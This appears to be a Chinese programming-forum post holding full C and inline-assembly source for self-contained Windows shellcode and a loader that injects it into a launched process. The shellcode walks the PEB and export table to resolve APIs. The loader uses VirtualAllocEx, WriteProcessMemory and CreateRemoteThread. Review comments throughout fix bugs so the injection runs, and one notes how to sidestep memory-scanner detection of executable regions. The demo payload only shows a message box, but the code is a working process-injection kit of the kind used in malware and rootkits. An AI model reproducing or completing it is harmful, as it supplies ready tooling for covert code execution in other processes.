--------------------------------------------------ShellCode源代码-------------------------
#include "stdafx.h"
#include "windows.h"
#pragma section(".code",execute,read,write)
#pragma comment(linker, "/merge:.text=.code") // merge .text into the single .code section
#pragma comment(linker, "/merge:.data=.code") // merge .data into .code too, so the string literals travel with the code
#pragma comment(linker, "/section:.code,RWE") // mark .code readable, writable and executable
#pragma code_seg(".code")
#pragma comment(linker, "/entry:\"MyLoadLibray\"") // MyLoadLibray() is the image entry point (the CRT startup code is bypassed)
// NOTE(review): merging .data keeps the literals inside the extracted blob, but on x86 the
// compiler references globals by absolute address, so the bytes lifted out of .code are still
// not position-independent unless every such reference is avoided -- check the disassembly.
// Function-pointer types for the APIs the shellcode resolves at run time instead of importing.
// GetProcAddress is typed as returning DWORD rather than FARPROC: this truncates on 64-bit,
// matching the rest of the file, which is 32-bit only.
typedef DWORD (WINAPI *LPGETPROCADDRESS)(HMODULE,LPCSTR); // GetProcAddress
typedef HMODULE (WINAPI *LPLOADLIBRARY)(
LPCTSTR lpFileName // file name of module
);
typedef int (WINAPI *LPMESSAGEBOX)(HWND,LPCTSTR,LPCTSTR,UINT); // MessageBox
// Defined below: GetGPAFunAddr() walks kernel32's export table for GetProcAddress;
// GetKernel32Base() finds kernel32 through the PEB loader lists.
DWORD GetGPAFunAddr();
DWORD GetKernel32Base();
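// Shellcode entry point: resolve LoadLibraryW and MessageBoxW without any import and
// show a message box as proof that the injected code ran.
//
// DllName: currently ignored (the LoadLibraryW(DllName) call is left commented out, as in
//          the original); the remote thread created by InjectDll() passes NULL anyway.
// Returns: NULL on every path, exactly as the original did (the user32 handle is never
//          propagated). The original returned `false` from one path and left hModule
//          uninitialized; both are tidied here without changing the result.
//
// NOTE(review): this is declared without WINAPI, yet CreateRemoteThread() expects a
// __stdcall LPTHREAD_START_ROUTINE and /entry also expects __stdcall; on x86 a cdecl
// callee leaves the 4-byte argument on the stack when the caller thinks it was popped.
// Confirm which convention the build actually emits before trusting the return path.
HMODULE MyLoadLibray(TCHAR * DllName)
{
    (void)DllName;                      // unused until the commented call below is enabled
    HMODULE hModule = NULL;

    LPGETPROCADDRESS g_funGetProcAddress = (LPGETPROCADDRESS)GetGPAFunAddr();
    if (NULL == g_funGetProcAddress)
        return NULL;

    HMODULE hMod = (HMODULE)GetKernel32Base();
    if (NULL == hMod)
        return NULL;                    // GetProcAddress(NULL, ...) would fail anyway

    LPLOADLIBRARY g_funLoadLibrary = (LPLOADLIBRARY)g_funGetProcAddress(hMod, "LoadLibraryW");
    if (NULL == g_funLoadLibrary)
        return NULL;

    //hModule=g_funLoadLibrary(DllName);
    hModule = g_funLoadLibrary(L"user32.dll");
    if (NULL == hModule)
        return NULL;                    // was `return false` from an HMODULE function

    // The original called through this pointer without checking it.
    LPMESSAGEBOX g_funMessageBox = (LPMESSAGEBOX)g_funGetProcAddress(hModule, "MessageBoxW");
    if (NULL != g_funMessageBox)
        g_funMessageBox(NULL, L"123", NULL, MB_OK);

    return NULL;
}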
// Find kernel32.dll's base address without any import by walking the PEB loader list.
// 32-bit only: fs:[0x30] is the x86 TEB slot that holds the PEB pointer, and every
// offset below is the 32-bit structure layout.
// The active walk takes the THIRD entry of InMemoryOrderModuleList and assumes it is
// kernel32 (exe, ntdll, kernel32). NOTE(review): that ordering is a loader convention,
// not a documented contract -- verify on the target OS version.
// Returns: whatever the walk yields; there is no error path, so 0 only by accident.
DWORD GetKernel32Base()
{
DWORD dwKernel32Addr = 0;
__asm
{
push eax // eax is caller-saved, so this save/restore is redundant but harmless
/*
Disabled variant via InInitializationOrderModuleList:
mov eax,dword ptr fs:[0x30] // eax = address of the PEB
mov eax,[eax+0x0C] // eax = PEB->Ldr (pointer to PEB_LDR_DATA)
mov eax,[eax+0x1C] // eax = head of InInitializationOrderModuleList
mov eax,[eax] // eax = second entry in that list
mov eax,[eax+0x08] // eax = that entry's DllBase (kernel32.dll; on Win7 this is KernelBase.dll instead)
mov dwKernel32Addr,eax
*/
xor eax,eax; // eax = 0
mov eax,fs:[0x30]; // eax = PEB
mov eax,[eax+0x0c]; // eax = PEB->Ldr
mov eax,[eax+0x14]; // eax = Ldr->InMemoryOrderModuleList.Flink (1st entry, expected to be the exe)
mov eax,[eax]; // 2nd entry (expected: ntdll.dll)
mov eax,[eax]; // 3rd entry (expected: kernel32.dll)
mov eax,[eax+0x10]; // DllBase, offset relative to the entry's InMemoryOrderLinks field
mov dwKernel32Addr,eax
pop eax
}
return dwKernel32Addr;
}
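// Resolve kernel32!GetProcAddress by hand, walking the export table of the module returned
// by GetKernel32Base().
//
// Nothing in this function may call an imported routine: the bytes are lifted out of .code
// and executed in another process, where this module's import table does not exist. The
// original compared names with CRT strcmp(), which is exactly such a call (and a likely
// reason the injected blob "does nothing"); it is replaced by an inline byte compare.
//
// Returns: absolute address of GetProcAddress, or 0 when the base is 0, the module has no
//          export directory, or the name is not found. (The original returned an
//          uninitialized value when NumberOfNames was 0.)
// 32-bit only: RVAs are added to a DWORD base.
// NOTE(review): forwarded exports are not handled; fine for GetProcAddress itself, but do
// not reuse this helper for arbitrary names.
DWORD GetGPAFunAddr()
{
    DWORD dwAddrBase = GetKernel32Base();
    if (dwAddrBase == 0)
        return 0;

    // 1. DOS and NT headers.
    PIMAGE_DOS_HEADER pDos_Header = (PIMAGE_DOS_HEADER)dwAddrBase;
    PIMAGE_NT_HEADERS pNt_Header = (PIMAGE_NT_HEADERS)(dwAddrBase + pDos_Header->e_lfanew);

    // 2. Export directory; a module without one has VirtualAddress/Size == 0.
    PIMAGE_DATA_DIRECTORY pDataDir = pNt_Header->OptionalHeader.DataDirectory + IMAGE_DIRECTORY_ENTRY_EXPORT;
    if (pDataDir->VirtualAddress == 0 || pDataDir->Size == 0)
        return 0;
    PIMAGE_EXPORT_DIRECTORY pExport = (PIMAGE_EXPORT_DIRECTORY)(dwAddrBase + pDataDir->VirtualAddress);

    // 3. The three parallel export arrays (all stored as RVAs).
    PDWORD pAddrOfFun = (PDWORD)(pExport->AddressOfFunctions + dwAddrBase);
    PDWORD pAddrOfNames = (PDWORD)(pExport->AddressOfNames + dwAddrBase);
    PWORD pAddrOfOrdinals = (PWORD)(pExport->AddressOfNameOrdinals + dwAddrBase);

    // Target name built on the stack so the compare needs neither a CRT call nor a
    // reference to a literal in .data. NOTE(review): confirm in the disassembly that the
    // compiler emits immediate stores here rather than a memcpy from .rdata, otherwise
    // the blob is still position-dependent.
    const char szTarget[] = { 'G','e','t','P','r','o','c','A','d','d','r','e','s','s','\0' };

    // 4. Scan the export name table (ENT); the parallel ordinal table gives the index
    //    into the export address table (EAT).
    for (DWORD i = 0; i < pExport->NumberOfNames; i++)
    {
        const char *lpFunName = (const char *)(pAddrOfNames[i] + dwAddrBase);
        DWORD k = 0;
        while (szTarget[k] != '\0' && lpFunName[k] == szTarget[k])
            k++;
        if (szTarget[k] == '\0' && lpFunName[k] == '\0')
            return pAddrOfFun[pAddrOfOrdinals[i]] + dwAddrBase;
    }
    return 0;
}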
// 把编译成的代码从 .code 节中提取出来，做成字节数组（即下面 Code.h 中的 data），供注入程序使用。
--------------------------EXE注入代码-----------------------
#include "stdafx.h"
#include "windows.h"
#include "Code.h"
//TCHAR * DllPath=_T("G:\\Data\\Code\\RootKit相关\\ShellCodeBuildEnvironment\\Release\\dll.dll");
//TCHAR * ExePath=_T("c:\\windows\\system32\\notepad.exe");
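// Copy `lpBuf` (dwSize bytes of position-independent code) into `hProcess` and run it on a
// new remote thread, blocking until that thread exits.
//
// hProcess: needs PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD
//           (plus PROCESS_QUERY_INFORMATION). As in the original, the handle is CLOSED
//           on the success path only; on failure the caller still owns it.
// DllPath:  optional. When non-NULL it is copied into a 1024-byte slot in the target and the
//           slot's remote address is passed as the thread parameter. (The original allocated
//           the slot but never wrote it and always passed NULL; the current shellcode ignores
//           its parameter, so NULL callers see no change.)
// lpBuf/dwSize: the code bytes to execute.
// Returns: true when the remote thread was created and has finished; false on any API
//          failure, after releasing everything allocated so far.
//
// Fixes vs. the original: WriteProcessMemory and CreateRemoteThread results were ignored
// (a failed write then executed uninitialized target memory; a NULL thread handle went to
// WaitForSingleObject), the thread handle leaked, addStart leaked when the second
// VirtualAllocEx failed, and pointers were printed with %x.
// Security note: the regions are PAGE_EXECUTE_READWRITE -- the pattern memory scanners key
// on. Writing as RW and flipping to RX with VirtualProtectEx before the thread starts is
// the usual improvement; kept as-is here to preserve behaviour.
bool InjectDll(HANDLE hProcess,TCHAR * DllPath,void * lpBuf,DWORD dwSize)
{
    bool ok = false;
    BYTE *addStart = NULL;
    BYTE *DllAddr = NULL;
    HANDLE hThread = NULL;
    LPVOID lpParam = NULL;
    SIZE_T written = 0;

    addStart = (BYTE *)VirtualAllocEx(hProcess, 0, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!addStart)
    {
        printf("\n VirtualAllocEx失败,addStart==NULL");
        goto cleanup;
    }
    DllAddr = (BYTE *)VirtualAllocEx(hProcess, 0, 1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!DllAddr)
    {
        printf("\n VirtualAllocEx失败,DllAddr==NULLk");
        goto cleanup;
    }
    printf("\n addStart内存首地址为0x%p", addStart);
    printf("\n DllAddr内存首地址为0x%p", DllAddr);

    if (DllPath != NULL)
    {
        // Bounded copy of the path (including its terminator) into the 1024-byte slot.
        SIZE_T nChars = 0;
        while (DllPath[nChars] != 0)
            nChars++;
        SIZE_T cb = (nChars + 1) * sizeof(TCHAR);
        if (cb > 1024)
        {
            printf("\n DllPath too long for the 1024-byte slot");
            goto cleanup;
        }
        if (!WriteProcessMemory(hProcess, DllAddr, DllPath, cb, &written) || written != cb)
        {
            printf("\n WriteProcessMemory(DllPath) failed");
            goto cleanup;
        }
        lpParam = DllAddr;
    }

    if (!WriteProcessMemory(hProcess, addStart, lpBuf, dwSize, &written) || written != dwSize)
    {
        printf("\n WriteProcessMemory(code) failed");
        goto cleanup;
    }

    hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)addStart, lpParam, 0, 0);
    if (!hThread)
    {
        printf("\n CreateRemoteThread failed");
        goto cleanup;
    }
    WaitForSingleObject(hThread, INFINITE);
    ok = true;

cleanup:
    if (hThread)
        CloseHandle(hThread);
    if (addStart)
        VirtualFreeEx(hProcess, addStart, 0, MEM_RELEASE);
    if (DllAddr)
        VirtualFreeEx(hProcess, DllAddr, 0, MEM_RELEASE);
    if (ok)
        CloseHandle(hProcess);   // ownership quirk kept from the original: closed only on success
    return ok;
}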
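// Launch argv[1] and inject the `data` blob (the bytes extracted from the shellcode's .code
// section, see Code.h) into the new process.
//
// Fixes vs. the original: STARTUPINFO.cb was never set (dwYSize was assigned instead),
// argv[1] was read without checking argc, a BOOL was compared against NULL, and
// pi.hThread leaked. pi.hProcess is closed by InjectDll() on success and here on failure.
// NOTE(review): the remote thread is created immediately after CreateProcess returns,
// while the target's loader may still be initializing; if the payload never runs, try
// CREATE_SUSPENDED + ResumeThread or a short wait -- confirm on the target OS.
int _tmain(int argc, _TCHAR* argv[])
{
    if (argc < 2)
    {
        printf("usage: <this program> <target exe>\n");
        return 1;
    }

    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    si.cb = sizeof(si);   // was si.dwYSize

    if (!CreateProcess(argv[1], NULL, NULL, NULL, FALSE, CREATE_DEFAULT_ERROR_MODE, NULL, NULL, &si, &pi))
    {
        printf("\n CreateProcess failed, error %lu", GetLastError());
        return 1;
    }
    CloseHandle(pi.hThread);   // the primary-thread handle is never used

    // `data` is the byte array extracted from the shellcode's .code section.
    if (InjectDll(pi.hProcess, NULL, data, sizeof(data)))
        printf("注入成功");
    else
        CloseHandle(pi.hProcess);   // InjectDll closes it only on success

    //getchar();
    return 0;
}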
注入进去,但是没有任何反应,好奇怪呀。